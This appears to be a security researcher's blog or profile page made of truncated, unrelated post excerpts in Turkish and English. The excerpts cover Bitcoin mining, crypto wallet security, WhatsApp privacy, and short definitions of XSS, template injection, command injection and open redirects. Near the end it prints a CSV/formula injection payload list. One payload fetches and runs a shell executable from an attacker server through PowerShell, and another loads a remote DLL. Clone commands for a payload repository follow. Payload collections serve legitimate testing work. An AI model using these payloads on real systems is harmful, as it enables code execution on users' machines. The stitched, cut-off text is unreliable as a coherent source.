Bu yazımda son zamanlarda popüler olan bitcoin’den bahsetmeye devam edeceğim. Sosyal medya, haberler ve çevremizde sık sık duyduğumuz bir konu olan bitcoin, uzmanlara göre yeni yüz yılın dijital altını olarak tanımlanıyor. Bitcoin ile ilgili konuşulabilecek ve yazılabilecek çok fazla konu var, ben bu yazımda sizlere Bitcoin Mining veya Cloud Mining sitemlerinden bahsedeceğim.
Bitcoin’i şu şekilde tanımlıyorum: Bitcoin, 7/24 ödeme yapabileceğiniz ulaşılabilir bir online borsadır. Bu piyasanın artış ve yükselişi tamamen yatırımcıların kripto paraya talep gösterip göstermemesi ile alakalı bir konu. Talep arttıkça fiyat yükseliyor ve insanlarda kripto para borsasına yönelimi artıyor. Buna ek olarak, artık bir nevi pazarlama dünyası haline…
Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted web sites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it.
An attacker can use XSS to send a malicious script to an unsuspecting user. The end user’s browser has…
Server-side template injection is when an attacker is able to use native template syntax to inject a malicious payload into a template, which is then executed server-side.
Template engines are designed to generate web pages by combining fixed templates with volatile data. Server-side template injection attacks can occur when user input is concatenated directly into a template, rather than passed in as data. This allows attackers to inject arbitrary template directives in order to manipulate the template engine, often enabling them to take complete control of the server. …
Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application. Command injection attacks are possible when an application passes unsafe user supplied data (forms, cookies, HTTP headers etc.) to a system shell. In this attack, the attacker-supplied operating system commands are usually executed with the privileges of the vulnerable application. Command injection attacks are possible largely due to insufficient input validation.
This attack differs from Code Injection, in that code injection allows the attacker to add his own code that is then executed by the application. In…
Unvalidated redirects and forwards are possible when a web application accepts untrusted input that could cause the web application to redirect the request to a URL contained within untrusted input. By modifying untrusted URL input to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials.
Because the server name in the modified link is identical to the original site, phishing attempts may have a more trustworthy appearance. …
In this article, I wanted to write a general article about you and cyber security. As you know, crypto coins have entered our lives quickly. However, it also brought some risks for cryptocurrency users. Every user-friendly solution brings risks with it.
But first of all, why would a person use cryptocurrency?
Malüm konu bildiğiniz gibi AB ülkesi olmayan ülkeler için WhatsApp’ın gizlilik politikasına dair paylaşımından sonra bir çok insan farklı mesajlaşma uygulamlarına geçiş yaptı. Bu ilk deneme, ileriki zamanlarda AB ve ABD’de de bu politika uygulanacak. Durum böyle olunca Twitter hesabından Elon Musk’da konu üzerine bir tweet attı.
Bir önceki yazımda Kripto Paralar ve Siber Güvenlik Riskleri adı başlığında bir giriş yazısı yayınlamıştım. Bu yazımda ise kripto para cüzdan cüzdan güvenliğinden bahsetmek istedim. Bildiğiniz üzere bir çok kripto para çeşiti olduğu gibi bir çok kripto para cüzdanı bulunuyor. Seçim yapmak istediğiniz de hangisini seçmeniz gerektiğini bu yazıdan sonra daha iyi karar verebilir. Kripto cüzdanları konsuda daha fazla bilgiye sahip olucaksınız.
Her şey son kullanıcıda bitiyor ve sizler için hazırladığım 10 maddeye dikkat etmenizde fayda olcağını düşünüyorum.
Bu yazımda sizlere ve siber güvenlik konusunda genel bir yazı yazmak istedim. Bildiğiniz üzere kripto paralar hayatımıza hızlıca giriş yaptı. Fakat bununla beraber kripto para kullanıcıları için bazı riskleri de getirdi. Her kullanıcı dostu çözüm beraberinde riskleri de getiriyor.
CSV Injection, also known as Formula Injection, occurs when websites embed untrusted input inside CSV files.
DDE ("cmd";"/C calc";"!A0")A0
@SUM(1+9)*cmd|' /C calc'!A0
=10+20+cmd|' /C calc'!A0
=cmd|' /C notepad'!'A1'
=cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0
=cmd|'/c rundll32.exe \\10.0.0.1\3\2\1.dll,0'!_xlbgnm.A1
Examples from the real world :
CSV Injection :
Cloning an Existing Repository ( Clone with HTTPS )
root@ismailtasdelen:~# git clone https://github.com/payloadbox/csv-injection-payloads.git
Cloning an Existing Repository ( Clone with SSH )
root@ismailtasdelen:~# git clone git@github.com:payloadbox/csv-injection-payloads.git
GitHub : https://github.com/payloadbox/csv-injection-payloads
🎯 Security Researcher | Bug Bounty Hunter | Exploit Development | Chess Player | Code is Life | 0xBUFFDEAD | Advisor 🎯